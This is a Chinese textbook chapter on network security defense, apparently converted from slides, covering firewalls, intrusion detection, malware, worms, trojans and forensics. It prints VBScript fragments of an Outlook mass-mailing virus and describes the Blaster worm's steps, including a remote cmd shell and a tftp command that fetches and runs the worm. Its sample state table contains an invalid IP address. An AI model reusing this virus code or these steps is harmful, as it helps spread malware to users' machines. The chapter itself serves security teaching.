1、第6章 网络安全防护技术网络安全防护技术是指为防止网络通信阻塞、中断、瘫痪或被非法控制等以及网络中传输、存储、处理的数据信息丢失、泄露或被非法篡改等所需要的相关技术。本章主要针对常见的网络攻击手段、入侵机制,讨论一些针对性较强的网络安全防护技术,如防火墙、入侵检测及恶意代码防范与响应等。虽然这些技术对防御具体的入侵机制很有效,但毕竟合法系统难以预测攻击者究竟会以什么样的机制实施入侵,攻击者也肯定不会总遵循固定的规则实施攻击,因此需要更具有普遍性的解决方案,进而引入了对入侵检测系统、网络攻击取证与安全审计等方面的讨论。第6章 网络安全防护技术n6.1 防火墙技术防火墙技术6.1.1 防火墙概述6
2、.1.2 防火墙技术原理6.1.3 防火墙的体系结构6.1.4 防火墙的部署应用实例6.1.5 典型硬件防火墙的配置n6.2 入侵检测系统入侵检测系统6.2.1 何谓入侵检测系统6.2.2 入侵检测系统的分析技术6.2.3 入侵检测系统的设置与部署6.2.4 典型入侵检测系统应用实例n6.3 恶意代码防范与应急响应恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应6.3.2 网络病毒及其防范6.3.3 网络蠕虫6.3.4 特洛伊木马6.3.5 网页恶意代码6.3.6 僵尸网络n6.4 网络攻击取证与安全审计网络攻击取证与安全审计6.4.1 计算机取证技术6.4.2 网络安全审计6.1 防
3、火墙技术6.1.1防火墙概述防火墙是一种综合性较强的网络防护工具,涉及到计算机网络技术、密码技术、软件技术、安全协议、安全标准、安全操作系统等多方个面。它通常是一种软件和硬件的组合体,用于网络间的访问控制,防止外部非法用户使用内部网络资源,保护内部网络的设备不被破坏,防止内部网络的敏感数据被窃取。防火墙具有过滤进出网络的数据、管理进出网络的访问行为、禁止非法访问等基本功能。6.1 防火墙技术6.1.1防火墙概述n1.防火墙的基本概念所谓防火墙是指设置在不同网络或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的唯一出入口,能根据部门的安全策略控制(允许、拒绝、监测)出入网络的
4、数据流,且本身具有较强的抗攻击能力。在物理组成上,防火墙系统可以是路由器,也可以是个人计算机、主机系统,或一批向网络提供安全保障的软硬件系统。在逻辑上,防火墙是一个分离器、一个限制器,也可以是一个分析器。6.1 防火墙技术6.1.1防火墙概述n1.防火墙的基本概念图6-1 防火墙逻辑示意图6.1 防火墙技术6.1.1防火墙概述n2防火墙的主要功能1)通过防火墙可以定义一个阻塞点(控制点),过滤进、出网络的数据,管理进、出网络的访问行为,过滤掉不安全服务和非法用户,以防止外来入侵。2)控制对特殊站点的访问,例如可以配置相应的WWW和FTP服务,使互联网用户仅可以访问此类服务,而禁止对其它系统的访
5、问。3)记录内外通信的有关状态信息日志,监控网络安全并在异常情况下给出告警。4)可用作IPSec的平台,如可以用来实现虚拟专用网(VPN)。6.1 防火墙技术6.1.1防火墙概述n3.防火墙的实现原则防火墙是一个矛盾统一体,它既要限制数据的流通,又要保持数据的流通。实现防火墙时可遵循两项基本原则:1)一切未被允许的都是禁止的。根据这一原则,防火墙应封锁所有数据流,然后对希望提供的服务逐项开放。这种方法很安全,因为被允许的服务都是仔细挑选的;但限制了用户使用的便利性,用户不能随心所欲地使用网络服务。2)一切未被禁止的都是允许的。根据这一原则,防火墙应转发所有数据流,然后逐项屏蔽可能有害的服务。这
6、种方法较灵活,可为用户提供更多的服务,但安全性差一些。由于这两种防火墙实现原则在安全性和可使用性上各有侧重,实际中,很多防火墙系统在两者之间做一定的折衷。6.1 防火墙技术6.1.1防火墙概述n4.防火墙的主要类型(1)包过滤防火墙(2)应用代理防火墙(3)电路层防火墙(4)状态检测防火墙6.1 防火墙技术6.1.2 防火墙技术原理自采用包过滤技术的第一代防火墙到现在,防火墙技术经历了包过滤、应用代理、状态检测及深度检测技术等发展阶段,目前,已有多种防火墙技术可供网络安全管理员选择使用。n1.包过滤技术简单的说,包过滤(Packet Filtering)就是在网络层,依据系统事先设定的过滤规则
7、,检查数据流中的每个包,根据包头信息来确定是否允许数据包通过。6.1 防火墙技术6.1.2 防火墙技术原理n1.包过滤技术图 6-2 包过滤工作原理6.1 防火墙技术6.1.2 防火墙技术原理n2.代理服务器技术所谓代理服务器是指代表内网向外网服务器进行连接请求的服务程序,其基本工作原理是:代理服务器监听网络内部客户机的服务请求,当一个连接到来时,首先进行身份和授权访问等级认证,并根据安全策略决定是否中转。当请求符合安全策略时,代理服务器上的客户机进程代表这个请求向真正的服务器发出请求,然后将服务器的响应数据转发给内部客户机。6.1 防火墙技术6.1.2 防火墙技术原理n3.状态检测技术其关键
8、是在防火墙的核心部分建立状态连接表,并将进出网络的数据包当成一个一个的会话,利用状态连接表跟踪每一个会话状态。状态检测防火墙不仅根据规则表对每一个数据包进行检查,而且还考虑数据包是否符合会话所处的状态,通过对高层的信息进行某种形式的逻辑或数学运算,提供对传输层的控制。6.1 防火墙技术6.1.2 防火墙技术原理n3.状态检测技术如表6-3所列,每个当前建立的连接都记录在状态连接表里,如果一个数据包的源端口是系统内部的一个介于1024和16383之间的端口,而且它的信息与状态连接表里的某一条记录相符,包过滤器才允许它进入。源地址源端口目的地址目的端口连接状态192.168.19.10110302
9、16.199.88.2980已建立192.168.19.1021031210.32.188.12380已建立192.168.19.1061033192.168.1.625已建立210.199.216.193356192.168.1.679已建立223.256.18.231025192.168.1.680已建立表6-3 状态检测防火墙的状态连接表示例6.1 防火墙技术6.1.3 防火墙的体系结构目前,防火墙的体系结构有双重宿主主机体系结构、屏蔽主机体系结构、屏蔽子网体系结构,以及新型混合防火墙体系结构等类型。1.双重宿主主机体系结构6.1 防火墙技术6.1.3 防火墙的体系结构2.屏蔽主机体系结
10、构图6-8 屏蔽主机防火墙体系结构6.1 防火墙技术6.1.3 防火墙的体系结构n3.屏蔽子网体系结构图6-9 屏蔽子网防火墙体系结构6.1 防火墙技术6.1.4 防火墙的部署应用实例1区域分割的层叠方式图6-10 防火墙系统的层叠方式6.1 防火墙技术6.1.4 防火墙的部署应用实例2.区域分割的三角方式图6-11 以区域分割的三角方式部署防火墙6.1 防火墙技术6.1.4 防火墙的部署应用实例3.防火墙存在的缺陷1)防火墙不能防御不经过防火墙的攻击。2)防火墙不能防止感染了病毒的软件或文件的传输。这只能在每台主机上装反病毒软件。3)防火墙只能用来防御已知的威胁,不能防御全部的威胁。4)防火
11、墙不能防御恶意的内部用户。6.2 入侵检测系统6.2.1 何谓入侵检测系统入侵是指未经授权蓄意尝试访问、篡改数据,使网络系统不可使用的行为。入侵检测(Intrusion Detection),顾名思义便是对入侵行为的发觉,即在计算机网络系统中的若干关键点搜集信息,通过对所收集信息的分析发现网络系统中是否有违反安全策略的行为和遭到攻击的迹象。入侵检测的目的主要是:识别入侵者;识别入侵行为;检测和监视以实施的入侵行为;为对抗入侵提供信息,阻止入侵的发生和事态的扩大。进行入侵检测的软件、硬件组合便是入侵检测系统。6.2 入侵检测系统6.2.1 何谓入侵检测系统1入侵检测系统的基本结构图6-12 入侵
12、检测系统的基本结构6.2 入侵检测系统6.2.1 何谓入侵检测系统2.入侵检测系统的主要功能入侵检测系统作为一种积极主动的安全防护工具,提供了对内部攻击、外部攻击和误操作的实时防护,在网络系统受到危害之前进行报警、拦截和响应。一般说来,IDS应具有的功能为:监控、分析用户和系统的活动;核查系统配置和漏洞;评估关键系统和数据文件的完整性;对异常行为统计分析,识别攻击的活动模式并报警;对操作系统进行审计、跟踪管理。6.2 入侵检测系统6.2.1 何谓入侵检测系统3.入侵检测的过程(1)信息收集入侵检测的第一步是信息收集,收集的内容包括系统、网络、数据及用户活动的状态和行为。(2)数据分析对收集到的
13、数据进行分析是入侵检测系统的核心工作。按照数据分析的方式,一般有三种手段:模式匹配。统计分析。完整性分析。(3)结果处理通过数据分析发现了入侵迹象时,入侵检测系统把分析结果记录在日志文件中,并产生一个告警报告,同时还要触发警报到控制台。6.2 入侵检测系统6.2.1 何谓入侵检测系统4入侵检测系统的分类(1)按照入侵检测的体系结构划分基于主机的入侵检测系统、基于网络的入侵检测系统和分布式入侵检测系统。(2)按照入侵检测的时间分类实时入侵检测系统和事后入侵检测系统两种类型。6.2 入侵检测系统6.2.2 入侵检测系统的分析技术1.异常入侵检测技术(1)基于统计学方法的异常分析(2)基于计算机免疫
14、技术的异常检测方法(3)基于数据挖掘的异常检测方法2.特征分析检测技术(1)模式匹配(2)专家系统6.2 入侵检测系统6.2.3 入侵检测系统的设置与部署1.网络入侵检测系统的设置步骤6.2 入侵检测系统6.2.3 入侵检测系统的设置与部署2.入侵检测系统部署(1)基于网络入侵检测系统的部署一般说来,可以将入侵检测系统的部署点划分为外网入口、DMZ区、内网主干和关键子网4个部署点,如图6-14所示是一个部署入侵检测系统的典型方案。6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应何谓恶意代码?它们从哪里来?是如何传播的?应该如何防止?如果已经被恶意代码侵害,又应该如何处理?这些都
15、是恶意代码防范与应急响应所要讨论的重要内容。1.恶意代码的含义所谓恶意代码(Malicious Code)实质上是指一种在一定环境下可以独立执行的计算机程序或者嵌入到其它程序中的代码,也称之为恶意软件(Malicious Software)。恶意代码能在不被用户察觉的情况下启动运行,破坏计算机系统的安全性和完整性。6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应1.恶意代码的含义(1)恶意代码的分类1)不感染的依附性恶意代码。这类恶意代码主要有木马(Trojan)、逻辑炸弹(Logic Bomb)及后门(Back Door)或者陷门(Trap Door)等。2)不感染的独立性恶
16、意代码。这类恶意代码主要有点滴器(Dropper)、繁殖器(Generator)、恶作剧(Hoax)等。3)可感染的依附性恶意代码。这类恶意代码主要是指一段依附在其它程序上、可以进行自我繁殖的计算机病毒。4)可感染的独立性恶意代码。这类恶意代码主要有蠕虫(Worm)、网页恶意代码、计算机细菌(Germ)及僵尸网络等。6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应急响应1.恶意代码的含义(2)恶意代码的传播一般情况下,恶意代码有三种传播途径:一是利用操作系统漏洞或者软件漏洞传播;二是通过浏览器传播;三是利用用户的信任关系传播。6.3 恶意代码防范与应急响应6.3.1 何谓恶意代码与应
17、急响应2.什么是应急响应所谓应急响应(Incident Response或Emergency Response)通常指一个组织为了应对各种突发事件的发生所做的准备,以及在突发事件发生后所采取的措施和行动。6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范1.网络病毒的概念(1)计算机病毒的定义从广义上讲,凡能够引起计算机系统故障,破坏计算机数据的程序统称为计算机病毒。简言之,计算机病毒就是一种恶意代码,即可感染的依附性恶意代码。它隐藏在计算机系统资源中,能影响系统正常运行,并通过系统资源共享等途径进行传播。计算机病毒一般由三部分组成:主控程序负责病毒程序的组装和初始化工作;传染程序将病
18、毒程序传染到其它的可执行程序上去;破坏程序实现病毒程序编制者的破坏意图。6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范1.网络病毒的概念(2)网络病毒的含义若按病毒传播方式划分,可以将其分为单机病毒和网络病毒两类。所谓网络病毒是指,通过网络通信机制,引起计算机系统、网络系统故障,破坏网络通信及数据的恶意代码。网络病毒除具有计算机病毒的一般特性之外,还呈现出如下一些新的特点。1)传染速度快。2)清除难度大。3)破坏性强。6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范2.计算机病毒的结构及工作机制(1)计算机病毒的结构计算机病毒的基本特征是引导、触发、传染和破坏,因此一个计
19、算机病毒一般由引导模块、触发模块、传染模块和破坏模块组成。图6-16 计算机病毒工作机制示意图6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范3.典型邮件病毒代码分析n通过Outlook传播的病毒基本上用VBScript语言编写而成,其自我复制原理也是利用程序本身的脚本内容复制一份到一个临时文件,然后再在传播环节将其作为附件发送出去。例如,使用如下两行代码就可以将自身复制到C盘根目录下的temp.vbs文件中。nSet fso=CreateObject(“Scripting.FileSystemObject”)nFso.GetFile(WScript.ScriptFullName).
20、Copy(“C:temp.vbs”)n其中,第一行创建一个文件系统对象。第二行前面是打开这个脚本文件,WScript.ScriptFullName用于指明是这个程序本身,即一个完整的路径文件名;用GetFile函数获得这个文件;使用Copy函数将这个文件复制到C盘根目录下的temp.vbs文件中。6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范3.典型邮件病毒代码分析n如下的代码段可实现邮件病毒的传播:nSet ola=CreateObject(“Outlook.Application”)nOn Error Resume Nextnfor i=1 to 60nSet Mail=ola
21、.CreateItem(0)nMail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x)nMail.Subject=“Betreffder E-Mail”nMail.Body=“Textder E-Mail”nMail.Attachments.Add(“C:temp.vbs”)nMail.SendnOla.Quit6.3 恶意代码防范与应急响应6.3.2 网络病毒及其防范4.病毒的防范措施1)从管理上,建立严格的计算机使用、管理制度,执行有效的应用和操作规范;对外来软件和存储介质进行病毒检查,严禁使用来历不明的软件;保护
22、好随机携带的原始资料和软件版本,建立安全的资料备份制度;对计算机定期进行病毒检测,一旦发现病毒立即隔离,防止扩散,并报告主管部门;购买计算机时,必须考虑对计算机病毒的防范。2)从技术上,配备病毒检测程序,及时发现并消除病毒;制订病毒侵入应急技术措施,减少病毒造成的损失;严格保护硬盘,设置禁写保护,防止非法装载硬盘;采取加密手段,防止病毒入侵;研制“病毒疫苗”程序,增强程序的防病毒能力;创建安全操作系统,防止病毒破坏。3)在法律上,制订相应法规,对制造、施放和出售病毒的行为,给予严惩。6.3 恶意代码防范与应急响应6.3.3 网络蠕虫1.蠕虫病毒蠕虫(Worm),从广义上来讲一般认为是一种通过网
23、络传播的恶性病毒,但蠕虫病毒与一般病毒有很大区别,蠕虫是一种通过网络传播的恶性病毒,具有病毒的一些共性,如传播性、隐蔽性、破坏性等;同时又有自己的一些特征,如不利用文件寄生(只存在于内存中),对网络造成拒绝服务等。按照攻击对象不同,可以将蠕虫病毒分为两类:一类是面向企业用户和局域网的蠕虫,主要利用系统漏洞主动进行攻击破坏。这类蠕虫病毒以“红色代码”、“尼姆达”以及“SQL蠕虫王”等为代表。另一类是针对个人用户的蠕虫,通过网络(主要是电子邮件、恶意网页等形式)进行传播。这类蠕虫病毒以“爱虫”、“求职信”等病毒为代表。6.3 恶意代码防范与应急响应6.3.3 网络蠕虫1.蠕虫病毒蠕虫的工作过程一般
24、为:扫描:蠕虫开始随机选取某一段IP地址,然后对这一IP地址段上的主机进行扫描,探测存在漏洞的主机。有时可能会不断重复这一扫描过程。这样,随着蠕虫的传播,新感染的主机也开始进行这种扫描。网络上的扫描包就越多。攻击:当蠕虫扫描到网络中存在漏洞的主机后,就开始利用自身的破坏功能获取主机的管理员权限。利用原主机与新主机的交互,将蠕虫程序复制到新主机并启动。6.3 恶意代码防范与应急响应6.3.3 网络蠕虫2.蠕虫程序的功能结构和传播流程图6-17 蠕虫程序的功能结构模型6.3 恶意代码防范与应急响应6.3.3 网络蠕虫2.蠕虫程序的功能结构和传播流程图6-18 蠕虫程序传播流程6.3 恶意代码防范与
25、应急响应6.3.3 网络蠕虫3.典型蠕虫病毒实例分析冲击波蠕虫病毒执行流程如下:1)病毒运行时首先在内存中建立一个名为:“msblast.exe”的进程,该进程就是活的病毒体。病毒还会修改注册表,在“HKEY_LOCAL_MACH INESOFTWAREMicrosoftWindowsCurrentVersion Run”中添加键值:“windows autoupdate=msblast.exe”,这样在每次启动系统时,病毒就会自动运行。2)判断BILLY互斥体,如果已经感染,蠕虫退出。3)以20秒为间隔,检测一次网络连接状态。若未连入网络,永远循环。4)判断日期大于15号、月份大于8,蠕虫启
26、动syn flood攻击某网站更新站点,例如的Web服务端口80。5)首先感染子网IP地址,然后随机感染外网IP地址。6)感染其它主机,若缓冲区溢出成功,远程主机会在4444端口监听,提供cmd shell服务;然后本地开启tftp(69端口)服务,接着利用连接4444端口socket发送命令tftp-i ip GET msblast.exe,最后执行get后的程序。6.3 恶意代码防范与应急响应6.3.3 网络蠕虫4.网络蠕虫的防范措施(1)修补系统漏洞(2)删除蠕虫要利用的程序(5)接种疫苗(4)采用入侵检测技术(3)配置合适的网络防火墙6.3 恶意代码防范与应急响应6.3.3 网络蠕虫5
27、.网络蠕虫的清除方法(1)用杀毒软件查杀(2)手工清除先拨掉网线,启动任务管理器,在其中查找msblast.exe进程,找到后在进程上单击右键,选择结束进程。用文件搜索的方法查找到Msblast.exe后删除。修改注册表,点开始菜单中的运行,输入regedit后点确定运行注册表编辑器,找到“HKEY_LOCAL_MACH INESoftwareMicrosoftWindowsCurrentVersionRun”后,在右边找到键值“windows autoupdate=msblast.exe”,将其删除。重启计算机并打上补丁,以免计算机再次遭受蠕虫攻击。连接网线,恢复正常工作。6.3 恶意代码防
28、范与应急响应6.3.4 特洛伊木马1.木马的含义简单地讲,木马是一种带有恶意性质的远程控制软件。一般的木马包括一个服务器程序和一个客户机程序。服务器程序负责打开攻击的通道,放置在被入侵的计算机中,就像一个内奸特务。通常所说的木马程序即是服务器程序。客户机程序放在木马控制者的计算机中,负责攻击目标主机。6.3 恶意代码防范与应急响应6.3.4 特洛伊木马2.木马系统的关键技术(1)远程启动技术1)注册表启动。2)Windows系统服务。3)系统配置文件。4)修改文件关联。(2)自动隐藏技术1)进程插入。2)核心态隐藏。3)隐蔽通信技术。4)反弹式木马技术。(3)自动加载技术(4)输入设备控制(5
29、)远程文件管理6.3 恶意代码防范与应急响应6.3.4 特洛伊木马3木马自动加载程序代码示例6.3 恶意代码防范与应急响应6.3.4 特洛伊木马4.木马病毒的检测(1)检查网络通信流量(2)查看进程与网络连接(3)检查启动项(4)检查系统账户(5)查看进程加载的服务(6)使用病毒检测软件查杀木马6.3 恶意代码防范与应急响应6.3.5 网页恶意代码网页恶意代码又称为网页病毒,主要指某些网站使用的恶意代码。它用脚本语言来实现相关功能,利用软件和操作系统安全漏洞通过网页进行传播。网页恶意代码依赖于脚本引擎解释执行。1.网页恶意代码的特点及安全威胁网页恶意代码的常见危害形式有:1)更改主页设置;2)
30、隐藏“开始”菜单的命令;3)隐藏“我的电脑”中的硬盘;3)隐藏桌面图标;4)禁用DOS程序;5)修改登录窗口;6)修改IE浏览器的标题,即修改浏览器最上方的蓝色标题栏中的文字,在上面加入广告或宣传文字。6.3 恶意代码防范与应急响应6.3.5 网页恶意代码2.网页恶意代码的类型1)基于JavaScript的脚本病毒。2)基于VBScript的脚本病毒。3)基于PHP的脚本病毒。4)脚本语言与木马结合的病毒。6.3 恶意代码防范与应急响应6.3.5 网页恶意代码4.网页恶意代码的防范与清除1)不要轻易浏览一些来历不明的网站,特别是有不良内容的网站。2)如果系统己经遭到网页恶意代码的攻击,可采用手
31、工修改注册表相关键值的方法恢复系统。3)修改Windows IE浏览器中Internet选项的安全级别,把安全级别由“中”改为“高”。4)鉴于某些恶意代码调用ActiveXComponent类,可以对“C:WindowsJavaPackages”文件夹中含有ActiveXComponent.class类的ZIP文件重命名,还可以直接把Java文件夹重命名。5)如果己经知道某些网站具有恶意代码,可以在IE的Internet选项中启用分级审查,在许可站点标签中输入不想访问的网址,以便永不进入这些具有恶意代码的网站。6.4 网络攻击取证与安全审计6.4.1 计算机取证技术1.数字证据的概念(1)数字
32、证据的定义数字证据也称为计算机证据。计算机证据国际组织(International Organization on Computer Evidence,IOCE)给出的与数字证据相关的定义为:1)数字证据:法庭上可能成为证据的以二进制形式存储或传送的信息。2)原始数字证据:查封计算机犯罪现场时,相关物理介质及其存储的数据对象。3)数字证据副本:原始物理介质上获取的所有数据对象的精确拷贝。4)拷贝:拷贝是指独立于物理介质,精确地再现数据对象中的信息。6.4 网络攻击取证与安全审计6.4.1 计算机取证技术2.计算机取证的定义计算机取证(Computer Forensic)在网络安全领域属于主动防
33、御技术,也称之为网络取证、数字取证、电子取证。比如一台计算机遭到黑客攻击,瘫痪了,硬盘数据被删,计算机取证就是利用特殊的分析软件,通过对磁盘的分析恢复数据记录。这项技术目前做得最好的是美国,可以非常精确地定位遭遇攻击的时间、地点和来源,甚至可以准确地判断是个人攻击行为还是团队攻击。计算机取证,即收集电子证据,是指对计算机入侵、破坏、欺诈、攻击等犯罪行为,利用计算机软硬件技术,按照符合法律规范的方法进行识别、保存、分析和提交数字证据的过程。6.4 网络攻击取证与安全审计6.4.1 计算机取证技术3.计算机取证的原则1)取证过程合法性。2)及时性。3)多备份。4)环境安全性。5)严格管理。6.4
34、网络攻击取证与安全审计6.4.1 计算机取证技术4.计算机取证的步骤1)保护现场和现场勘查。2)获取证据。3)鉴定、保存证据。4)证据分析。5)提交证据。6.4 网络攻击取证与安全审计6.4.1 计算机取证技术5.计算机取证的方法1)静态取证方法。静态取证方法是在案发之后或已经造成严重后果之后,对计算机硬件的原始数据进行保全、检查、分析,然后从中找出与案件有关的数字证据。静态取证缺乏实时性和连续性,证明力较弱。2)动态取证方法。动态取证方法是指对处于开机或联网状态下的计算机及其相关计算机设备(包括交换机、路由器等)的内存数据、网络运行数据、系统运行状况等进行相关的实时监控、分析和保存,从中发现相关的犯罪证据。在动态取证中最具特色的取证技术有:入侵检测取证技术、网络追踪技术、信息搜索与过滤技术、蜜罐/蜜网取证技术等。6.4 网络攻击取证与安全审计6.4.2 网络安全审计所谓网络安全审计,是指根据一定的安全策略记录,通过分析历史操作事件及数据,对一个特定网络安全的脆弱性进行测试、评估、分析的过程。1.安全审计系统的主要作用对潜在的攻击者起到震慑或警告作用;对已经发生的系统破坏行为提供有效的追纠证据;提供有价值的系统使用日志,帮助系统管理员及时发现系统入侵行为或潜在的系统漏洞;提供系统运行的统计日志,帮助系统管理员发现系统性能上的脆弱点或需要改进与加强的地方。